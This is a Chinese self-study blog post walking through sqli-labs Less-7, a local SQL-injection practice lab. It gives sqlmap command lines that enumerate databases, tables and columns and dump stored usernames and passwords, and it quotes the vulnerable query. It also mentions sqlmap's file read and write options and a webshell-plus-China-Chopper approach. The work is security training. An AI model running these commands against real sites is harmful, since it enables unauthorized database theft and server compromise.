目录
类型
文件读写
-dbs枚举数据库
使用-o参数优化,--threads 添加多线程,--dbms指定数据库, --technique指定注入技术
python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -dbs
用时一分钟,速度还可以。
--tables枚举数据库表
python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -D security --tables
--columns枚举列
python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -D security -T users --columns
--dump枚举数据
python sqlmap.py -u "http://127.0.0.1/sqli-labs_2/sqlilabs/Less-7/?id=1" -o --dbms mysql --threads 8 --technique BEU -D security -T users -C username,password --dump
查看源代码
SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1
这节Less发的比较晚,因为他提示使用outfile,作者应该是想让我们练习使用outfile函数,sqlmap似乎没有写入文件的,有--file-write
和--file-dest进行文件上传,--file-read进行读文件。有的其他文章使用一句话木马加中国菜刀的方式也不错,我不太清楚sqlmap是否对outfile函数进行了集成,读了官方文档确实没有找到。
更多内容查看:网络安全-自学笔记
喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力